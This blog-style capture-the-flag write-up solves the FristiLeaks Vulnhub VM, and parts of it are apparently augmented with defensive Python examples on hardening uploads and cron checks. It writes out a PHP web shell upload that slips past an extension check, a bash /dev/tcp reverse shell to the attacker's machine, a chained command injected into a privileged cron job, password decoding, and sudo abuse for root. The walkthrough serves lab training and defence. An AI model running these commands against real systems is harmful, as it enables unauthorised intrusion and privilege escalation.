Mr_H4sh

Infosec, CTF and more

FristiLeaks Solution

Hi guys,

This Christmas I had the opportunity to catch up with the latest VMs on Vulnhub.

In this post I’m going to show you how to solve the FristiLeaks VM provided by Ar0xA.

Thanks to Vulnhub for keeping me busy with all these challenges, and thanks to everyone that hosts new challenges.

This challenge involves various hacking techniques and privilege escalation.

First step: INFORMATION GATHERING

The description provided on Vulnhub says that the machine will have an IP assigned automatically, so this is the situation:

192.168.56.102 <== attacker
192.168.56.101 <== victim

A port scan on the victim host gives this:

# nmap -sT -p- -v -n -Pn 192.168.56.101 -T5

Nmap scan report for 192.168.56.101
Host is up (0.00073s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

The only open port is the port 80/tcp, so I have a look and this is what I find:

fristi-welcome

Second step: VULNERABILITY SCAN

I spider the website with Burp Suite and find a robots.txt file, but every path listed in it returns the same image, saying that the requested URL is not what I'm looking for.

The index page says Keep calm and drink Fristi, and all the entries in robots.txt are names of drinks, so I try http://192.168.56.101/fristi and this is what I find:

fristi-admin-portal

The source code has the following content:

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

[ html code cut on purpose ]

<!-- "data:img/png;base64, 
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg=="-->

Thank you eezeepz, this really makes the ‘testing easier’.

The image shown on the page is embedded as a base64 data URI, and a second one is commented out right below it, so I download the page source, decode the commented block, and the following image comes out:

fristi-eezeepz-password

This is eezeepz’s login password, so I login and I find a page that allows me to upload a file.
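The decoding step above can be scripted instead of done by hand-editing the page. The following is an added example, not code from the original post: it pulls every base64 data URI out of an HTML page, flags the ones that sit inside HTML comments, and identifies the real file type from the magic bytes instead of trusting the declared one. The sample page and its 1x1 PNG payload are constructed for the example; the img/png media type mirrors the non-standard one on the FristiLeaks page.

```python
import base64
import re

# Constructed sample page (not the real FristiLeaks source): one data URI inside
# a visible <img> tag and a second one inside an HTML comment, mimicking the
# "data:img/png;base64," block found on the /fristi page. The payload is a
# 1x1 PNG, wrapped across lines the way the original comment was.
SAMPLE_HTML = """<html><body>
<img src="data:img/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ
AAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==">
<!-- "data:img/png;base64,
iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA
60e6kgAAAABJRU5ErkJggg==" -->
</body></html>"""

# The page used the non-standard media type "img/png"; accept "img/" and "image/".
DATA_URI_RE = re.compile(
    r"data:(?:img|image)/([A-Za-z0-9.+-]+);base64,([A-Za-z0-9+/=\s]+)"
)
COMMENT_RE = re.compile(r"<!--.*?-->", re.S)

# File signatures for the formats an image upload form usually accepts.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpg",
}


def sniff_type(data):
    """Identify the real file type from its magic bytes, ignoring what the URI claims."""
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return "unknown"


def extract_data_uris(html):
    """Return every base64 data URI in the page, decoded, flagged if it sat in a comment."""
    comment_spans = [m.span() for m in COMMENT_RE.finditer(html)]
    found = []
    for m in DATA_URI_RE.finditer(html):
        declared, payload = m.group(1), m.group(2)
        # Browsers ignore whitespace inside a data URI payload; so do we.
        raw = base64.b64decode(re.sub(r"\s+", "", payload), validate=True)
        in_comment = any(s <= m.start() < e for s, e in comment_spans)
        found.append({
            "declared": declared.lower(),
            "actual": sniff_type(raw),
            "in_comment": in_comment,
            "data": raw,
        })
    return found


def save_hidden_images(html, prefix="hidden"):
    """Write only the commented-out images to disk, one file per URI."""
    written = []
    for i, img in enumerate(extract_data_uris(html)):
        if not img["in_comment"]:
            continue
        name = "%s_%d.%s" % (prefix, i, img["actual"])
        with open(name, "wb") as fh:
            fh.write(img["data"])
        written.append(name)
    return written


if __name__ == "__main__":
    for img in extract_data_uris(SAMPLE_HTML):
        where = "comment" if img["in_comment"] else "markup"
        print("%s: declared=%s actual=%s size=%d bytes"
              % (where, img["declared"], img["actual"], len(img["data"])))
    print("saved:", save_hidden_images(SAMPLE_HTML))
```

Run it against a saved copy of the page (read the file into extract_data_uris) and only the commented image is written out; checking the magic bytes matters because a comment can just as easily hide a non-image blob behind an image media type.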

Third step: EXPLOITATION

I test the form and find that it accepts only png, gif and jpg files, but the check looks at the file extension alone, and the uploads are stored in the /uploads folder.

So I take my trusted b374k web shell, rename it to myShell.php.png to pass the extension check, upload it and open http://192.168.56.101/uploads/myShell.php.png. The server executes it as PHP:

b374k-web-shell
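What made this work is that the form validated only the last extension, and the server then ran the .php.png file as PHP anyway. The following is an added example, not the VM's PHP code, that puts an extension-only check of the kind described above beside a hardened version: exactly one extension, an allowlisted extension, magic bytes that agree with it, and a server-generated storage name. The PHP stub and PNG header are constructed inputs, and naive_extension_ok is my assumption of how the original check behaves, since the page does not show its source.

```python
import os
import secrets

ALLOWED_EXT = {"png", "gif", "jpg"}

# Magic bytes for the three permitted formats.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
}


def naive_extension_ok(filename):
    """Assumed shape of the upload form's check (the page does not show its
    source): look only at the text after the last dot.
    'myShell.php.png' passes because its last extension is png."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXT


def sniff_type(data):
    """Return 'png', 'gif' or 'jpg' from the file header, or None."""
    for kind, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return kind
    return None


def hardened_store_name(filename, data):
    """Validate an upload and return the name it should be stored under.

    Raises ValueError on anything suspicious. Four rules:
      1. exactly one extension (no double extensions such as .php.png),
      2. the extension is on the allowlist,
      3. the content's magic bytes match that extension,
      4. the stored name is server-generated, so the client's name never hits disk.
    """
    base = os.path.basename(filename)
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        raise ValueError("exactly one extension required: %r" % filename)
    ext = parts[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    actual = sniff_type(data)
    if actual != ext:
        raise ValueError("content is %s, extension says %s" % (actual, ext))
    return "%s.%s" % (secrets.token_hex(16), ext)


# Constructed inputs: a PHP stub disguised as an image, and a PNG header
# followed by the start of its IHDR chunk.
PHP_STUB = b"<?php system($_GET['cmd']); ?>"
PNG_HEAD = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR"


def compare(filename, data):
    """Return (naive_verdict, hardened_verdict) so the two checks can be compared."""
    try:
        hardened_store_name(filename, data)
        strict = True
    except ValueError:
        strict = False
    return naive_extension_ok(filename), strict


if __name__ == "__main__":
    for name, data in [("myShell.php.png", PHP_STUB), ("shell.php", PHP_STUB),
                       ("cat.png", PNG_HEAD), ("cat.png", PHP_STUB)]:
        print("%-18s naive=%s hardened=%s" % (name, *compare(name, data)))
```

Even with these checks the upload directory must not be treated as executable: storing uploads outside the web root, or disabling the PHP handler for /uploads, is what stops a file that does slip through from running.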

First thing, I open a reverse shell back to my machine on port 443, since that is more convenient than wandering around in a browser:

On a local terminal:

# nc -l -v -p 443

On the remote shell:

$ /bin/bash -i >& /dev/tcp/192.168.56.102/443 0>&1

And so I’m in as user apache.

Fourth step: PRIVILEGE ESCALATION

I notice the file /var/www/notes.txt, whose content hints that I should check something in the home directory of the user eezeepz.

I go to eezeepz home folder and I notice the file /home/eezeepz/notes.txt with the following content:

Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

So, as far as I understand, I have to create the file /tmp/runthis and a cron job will execute it as a more privileged user. Ideal.

I find out that the privileged user is admin, and that each line of /tmp/runthis is accepted only if it starts with /home/admin or /usr/bin. The check is only on the start of the line, and the line is then executed through a shell, so I can chain a second command after a legitimate /usr/bin binary. I write a line that runs whoami from /usr/bin and then makes /home/admin accessible to everybody:

echo "/usr/bin/whoami && chmod -R 777 /home/admin" > /tmp/runthis

I wait a minute and check the permissions on /home/admin: it is now accessible by everybody, and /tmp/cronresult holds the output of whoami, confirming which user the job runs as.
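The flaw in that cron job is a prefix check on a line that is then handed to a shell: anything after && or ; runs with admin's privileges. As an added example (not the VM's cron script, which the page does not show), the block below contrasts that weak check with a runner that tokenises the line itself, refuses shell metacharacters, normalises the binary path and compares it against an explicit allowlist of binaries rather than directories. The allowlist and the sample /tmp/runthis lines are constructed; the binary list is an assumption based on Jerry's note.

```python
import os
import shlex
import subprocess

# Assumed allowlist, built from the note on the page: a couple of /usr/bin
# tools plus the copies admin placed in /home/admin. A real deployment would
# list exactly the binaries the automated checks need and nothing else.
ALLOWED_BINS = frozenset({
    "/usr/bin/whoami", "/usr/bin/id", "/usr/bin/uptime",
    "/home/admin/df", "/home/admin/cat", "/home/admin/echo",
    "/home/admin/ps", "/home/admin/grep", "/home/admin/egrep",
})
ALLOWED_PREFIXES = ("/home/admin/", "/usr/bin/")
SHELL_META = set(";&|`$<>(){}\n")


def prefix_check(line):
    """The weak check the cron job appears to use: the line only has to start
    with an allowed directory. The whole line is then handed to a shell, so
    everything after '&&' or ';' runs as well."""
    return line.startswith(ALLOWED_PREFIXES)


def parse_strict(line):
    """Hardened version: parse the line into an argv list, never via a shell,
    and require argv[0] to be an exact allowlisted binary. Raises ValueError."""
    if any(c in SHELL_META for c in line):
        raise ValueError("shell metacharacters are not allowed")
    argv = shlex.split(line)
    if not argv:
        raise ValueError("empty line")
    # normpath collapses '/usr/bin/../../bin/sh' to '/bin/sh'. On a live system
    # apply os.path.realpath too, so a symlink cannot point outside the allowlist.
    prog = os.path.normpath(argv[0])
    if prog not in ALLOWED_BINS:
        raise ValueError("binary not on allowlist: %r" % prog)
    return [prog] + argv[1:]


def run_strict(line, timeout=10):
    """Run one validated line without a shell and return its stdout."""
    argv = parse_strict(line)
    result = subprocess.run(argv, capture_output=True, text=True,
                            timeout=timeout, check=False)
    return result.stdout


def audit(lines):
    """For each runthis line return (line, weak verdict, strict verdict)."""
    report = []
    for line in lines:
        try:
            parse_strict(line)
            strict_ok = True
        except ValueError:
            strict_ok = False
        report.append((line, prefix_check(line), strict_ok))
    return report


# Constructed /tmp/runthis contents: the injection used above plus variants.
RUNTHIS = [
    "/usr/bin/whoami",
    "/usr/bin/whoami && chmod -R 777 /home/admin",
    "/usr/bin/whoami; /bin/sh -c 'id > /tmp/pwned'",
    "/usr/bin/../../bin/sh",
    "/home/admin/cat /home/admin/cryptedpass.txt",
    "/usr/bin/python -c 'print 1'",
]

if __name__ == "__main__":
    for line, weak, strict in audit(RUNTHIS):
        print("weak=%-5s strict=%-5s %s" % (weak, strict, line))
```

A directory allowlist is not enough on its own: /usr/bin contains interpreters such as python, so the strict version rejects /usr/bin/python even though it sits under an allowed prefix. Arguments still need scrutiny (chmod from /home/admin with a path argument is still chmod), so the real fix is to list exactly the command lines admin intends to run.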

The folder contains several files, and the ones that get my attention are cryptedpass.txt, whoisyourgodnow.txt and cryptpass.py.

The first two contain obfuscated passwords (not hashes: the transformation is reversible), and the third is the script that produced them:

# cat cryptpass.py

import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

The script base64-encodes the given string, reverses the result and then applies rot13. No key is involved, so the process can simply be run backwards.

So, I write a script that undoes the three steps in reverse order:

#!/usr/bin/env python3
import base64
import codecs
import sys

def decodeString(s):
    # Undo cryptpass.py step by step: rot13 is its own inverse, then put the
    # string back in its original order, then base64-decode.
    base64string = codecs.decode(s, 'rot13')
    return base64.b64decode(base64string[::-1]).decode()

decryptedResult = decodeString(sys.argv[1])
print(decryptedResult)

And these are the decoded passwords:

admin : thisisalsopw123
fristigod : LetThereBeFristi!

I log in as fristigod, but the user can't become root directly. So I go to the home folder /var/fristigod and have a look at the .bash_history file:

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

It looks like fristigod was running commands as user fristi via sudo through the binary /var/fristigod/.secret_admin_stuff/doCom (sudo -l as fristigod is the quick way to confirm the exact rule). doCom executes whatever command it is given, so I run the following to spawn a shell, and the shell turns out to be root:

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/sh

sh-4.1# whoami
root

Excellent, I’m root. Time to get the flag.

sh-4.1# ls -l /root
total 4
-rw-------. 1 root root 246 Nov 17 12:19 fristileaks_secrets.txt
sh-4.1# cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1

Conclusion

As usual, for any question or remark, please do not hesitate to leave a comment.

./A